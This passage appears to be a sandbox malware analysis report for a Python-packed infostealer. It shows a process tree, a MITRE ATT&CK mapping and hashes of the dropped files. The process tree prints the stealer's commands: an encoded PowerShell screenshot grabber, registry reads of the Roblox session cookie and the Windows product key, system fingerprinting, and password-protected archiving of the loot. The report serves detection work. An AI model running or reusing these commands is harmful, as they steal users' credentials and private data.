      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5064
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cqxsvwn4\cqxsvwn4.cmdline"
        5⤵
        
        PID:4600
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES72AF.tmp" "c:\Users\Admin\AppData\Local\Temp\cqxsvwn4\CSC9F60297E805F4A899849BDE2A17EEEF0.TMP"
        6⤵
        
        PID:4404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4312
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1648
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3448
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4896
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1360
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:844
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:5096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4344
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:32
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI38242\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\bGxPC.zip" *"
    3⤵
    PID:1400
  - - C:\Users\Admin\AppData\Local\Temp\_MEI38242\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI38242\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\bGxPC.zip" *
      4⤵
      Executes dropped EXE
      PID:5052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4496
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:2004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:5088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5080
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1132

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
cd5b15b46b9fe0d89c2b8d351c303d2a

SHA1
e1d30a8f98585e20c709732c013e926c7078a3c2

SHA256
0a8a0dcbec27e07c8dc9ef31622ac41591871416ccd9146f40d8cc9a2421da7a

SHA512
d7261b2ff89adcdb909b775c6a47b3cd366b7c3f5cbb4f60428e849582c93e14e76d7dcadec79003eef7c9a3059e305d5e4f6b5b912b9ebc3518e06b0d284dd7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0650803b832b10405eb9e7da2e91d784

SHA1
a6f8925e421783b31a3d22554004ecfc684e8c9c

SHA256
67df152607d9f463779628be5af4fef173b02fd2aa66755898b0d43b469710b3

SHA512
804262220d22adce4c23effc00cc8d74d1b3db14ed43b7a337bdb2a90dd00f69b59b9924aca196251109ba5a91610d743243d4fc68c8314f42d101570408e95e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
87ec7e8a59f7f1d388b31597aedf0a5e

SHA1
58f0fc538de4eb452aea90ccd083ec711d89d49c

SHA256
28538c7f5929d17f9e85b43af7671288a0286fcfbdd0194f61e82a0eda081a98

SHA512
eb3e0776903601040f1058f6915412f1d8292874d9b4a6a8e64962d311ad7488cd1dd6b6ce3776d24dc04cb631a9d675c27a329764a53b60e57502d6298c981b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f3cb4a22571c589deaaf8270d54e06d6

SHA1
9f61855c15c8f0729260ebc0089fe4170e802f9e

SHA256
9c47713750d1b864c314b3f30caaa816aaf722491ad6b09b784a263d12e4f6ea

SHA512
c2dfb8160ac646577be05845be3867205d74f4d77689a903abc930e0e265de6fc2652a9d5776ba35f1cacc40d1f3eac64141e5083513b06b266acc42d789662a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1c5d8bf274d4d2f8e604ab94c2f9474d

SHA1
4b0bbab28214e5a311443866eb89e0660adc1f57

SHA256
1d33f0af2479ede38d1ef0b514c0d02ba6a767a96bd5ce0d770d05b75c41e0a8

SHA512
a2329128e246a7dbf8eed82bd67855c50d3bfed2a02ef8cf677cda2403a9832c81d475fb47049a3b0e371b9b11ef09546ad95dd32c2c14ee5aeb01c035f27557

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9420fd1574ed77b4f5ea5b6759870e17

SHA1
7c00cca7487a97fe843c05865da6de660eaec41e

SHA256
641be7a6b593324eb0127ef76d603538a7fabdbc542a853533b2694f21556e42

SHA512
7446b1f8e010022569b8204dd61a91fd7f2fbccb8924bc83f66d6fa331c323453bffa56f672c7337f21f6651b06c4a0281bea17120fa91cda334f8fd6adcf121

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6e364b9a51edf27117fe0f26bb0b7008

SHA1
7a30b19b3f483ba4ff85c30d02495886fe1e2c45

SHA256
1da7ca3b0ef5556228af9fc49a664d660389343368f4a4c4156ff50911b5fc36

SHA512
d2d35036739b58132cc449216214eb9978e891aded4215f58402f7e47b37d77bf80a694b1dfe6bd7f83d88480273a561092d4b58dc724b67086e5e68b8b31965

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES72AF.tmp

Filesize
1KB

MD5
493764f27d234f2b35da3530d5734d7d

SHA1
974ee1796d2020bb53fe023b172d335bf93b9bce

SHA256
db076fae990922f47e39dabcb2a242a40e16887134830d0fdafd39f8bb51c93b

SHA512
31511952c9cacb853062f60edc593de840a6151b2c59cedaad069441eb5f65d96caf30219f373c593bada222f8f3525250e2a9e0e57e90b6e94bef7e26f1b34d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\VCRUNTIME140.dll

Filesize
106KB

MD5
49c96cecda5c6c660a107d378fdfc3d4

SHA1
00149b7a66723e3f0310f139489fe172f818ca8e

SHA256
69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

SHA512
e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\_bz2.pyd

Filesize
48KB

MD5
c413931b63def8c71374d7826fbf3ab4

SHA1
8b93087be080734db3399dc415cc5c875de857e2

SHA256
17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293

SHA512
7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\_ctypes.pyd

Filesize
58KB

MD5
00f75daaa7f8a897f2a330e00fad78ac

SHA1
44aec43e5f8f1282989b14c4e3bd238c45d6e334

SHA256
9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f

SHA512
f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\_decimal.pyd

Filesize
106KB

MD5
e3fb8bf23d857b1eb860923ccc47baa5

SHA1
46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0

SHA256
7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3

SHA512
7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\_hashlib.pyd

Filesize
35KB

MD5
b227bf5d9fec25e2b36d416ccd943ca3

SHA1
4fae06f24a1b61e6594747ec934cbf06e7ec3773

SHA256
d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7

SHA512
c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\_lzma.pyd

Filesize
85KB

MD5
542eab18252d569c8abef7c58d303547

SHA1
05eff580466553f4687ae43acba8db3757c08151

SHA256
d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9

SHA512
b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\_queue.pyd

Filesize
25KB

MD5
347d6a8c2d48003301032546c140c145

SHA1
1a3eb60ad4f3da882a3fd1e4248662f21bd34193

SHA256
e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192

SHA512
b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\_socket.pyd

Filesize
43KB

MD5
1a34253aa7c77f9534561dc66ac5cf49

SHA1
fcd5e952f8038a16da6c3092183188d997e32fb9

SHA256
dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f

SHA512
ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\_sqlite3.pyd

Filesize
56KB

MD5
1a8fdc36f7138edcc84ee506c5ec9b92

SHA1
e5e2da357fe50a0927300e05c26a75267429db28

SHA256
8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882

SHA512
462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\_ssl.pyd

Filesize
65KB

MD5
f9cc7385b4617df1ddf030f594f37323

SHA1
ebceec12e43bee669f586919a928a1fd93e23a97

SHA256
b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6

SHA512
3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\base_library.zip

Filesize
1.4MB

MD5
32ede00817b1d74ce945dcd1e8505ad0

SHA1
51b5390db339feeed89bffca925896aff49c63fb

SHA256
4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a

SHA512
a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\blank.aes

Filesize
120KB

MD5
a6084dd9909ec689c780bd266ea1fae5

SHA1
c74511f0f3c29e5f7b79fc48ef1c9d86fff59c3b

SHA256
c9cee5a6e4e5aec8ea24e90581833604a4b1e807746d081925f26cf006aceacf

SHA512
2375554f0e637866589a10979aff1228024e7b94020f3516b65418b8049bcc1c1e74455a026d5daface64277ed7925de496cb442a852e615a230c840c31a9f9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\blank.aes

Filesize
120KB

MD5
d1b8f1b2bdd28797ebff277f95008a22

SHA1
35c0d173d15a15eab0d5182a679eb708982eae78

SHA256
949341921c7ac84cc9ccc9b85bd952caffaf5495f5ca3cb2b3013be31af671b8

SHA512
0d5b27a99ed37a72623c7bfe5e8831c3f4976f3a4ddfe933d434e1de97e22502f5841cefb1d1c417ad854501fcb39f2d7617b4ad2e1788658067d52930144b33

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\libcrypto-3.dll

Filesize
1.6MB

MD5
78ebd9cb6709d939e4e0f2a6bbb80da9

SHA1
ea5d7307e781bc1fa0a2d098472e6ea639d87b73

SHA256
6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e

SHA512
b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\libssl-3.dll

Filesize
223KB

MD5
bf4a722ae2eae985bacc9d2117d90a6f

SHA1
3e29de32176d695d49c6b227ffd19b54abb521ef

SHA256
827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147

SHA512
dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\python311.dll

Filesize
1.6MB

MD5
5f6fd64ec2d7d73ae49c34dd12cedb23

SHA1
c6e0385a868f3153a6e8879527749db52dce4125

SHA256
ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967

SHA512
c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\select.pyd

Filesize
25KB

MD5
45d5a749e3cd3c2de26a855b582373f6

SHA1
90bb8ac4495f239c07ec2090b935628a320b31fc

SHA256
2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876

SHA512
c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\sqlite3.dll

Filesize
622KB

MD5
dbc64142944210671cca9d449dab62e6

SHA1
a2a2098b04b1205ba221244be43b88d90688334c

SHA256
6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c

SHA512
3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\unicodedata.pyd

Filesize
295KB

MD5
8c42fcc013a1820f82667188e77be22d

SHA1
fba7e4e0f86619aaf2868cedd72149e56a5a87d4

SHA256
0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2

SHA512
3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pujdduu0.ma4.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cqxsvwn4\cqxsvwn4.dll

Filesize
4KB

MD5
e44a0b5149ad5cbbbf8dd4a9f12791ac

SHA1
dc6c514607c9dddcfc2bc2ba3c3481ffc22fab87

SHA256
042149f403d9c507e30c1d16bc0f887c7111c8d662919210c823675fdf3de57f

SHA512
0344f85ab3490e5653785426b8deb25ab56e245ffb94f0e9dbf49e5fcd77f7e517ea16673aee2d35267eec5f110954aee0e2ed07a4f9612e56a36fa07ca05475

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‍ \Display (1).png

Filesize
405KB

MD5
6c7f875c7c305cebbe856f26dda483f7

SHA1
ad4f80c65beaf53829633d04000686afd14e5eea

SHA256
2275c8edecde5ef7d64fb92ea389af5d15bc938e9aad3e9451608ad59e815a4a

SHA512
67d01275365d2504dc8f8928e549b3d020fee431e6e0fef42a1ce886ba9d60a236f917981861c003bb6d7b44d115ca062535fe7458d082bb3008c8142b2a2848

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cqxsvwn4\CSC9F60297E805F4A899849BDE2A17EEEF0.TMP

Filesize
652B

MD5
11b3f96f44f491b549144566276f0d62

SHA1
3a4d6e8d4884e282acbe8b3d58d6d0e77cb5c466

SHA256
e9c9c28fb1090adc1d00a0fc14b74fd335224a0d4d39b9cfafb956e250447e63

SHA512
df70b631b653ad3f8c9b279c06d58d8bda84f709b17c97306157bb8088656cf6018aab0eff04ab5617ab2a0e981943e82e58716cc6c8f7fa02682d0f3db9d980

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cqxsvwn4\cqxsvwn4.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
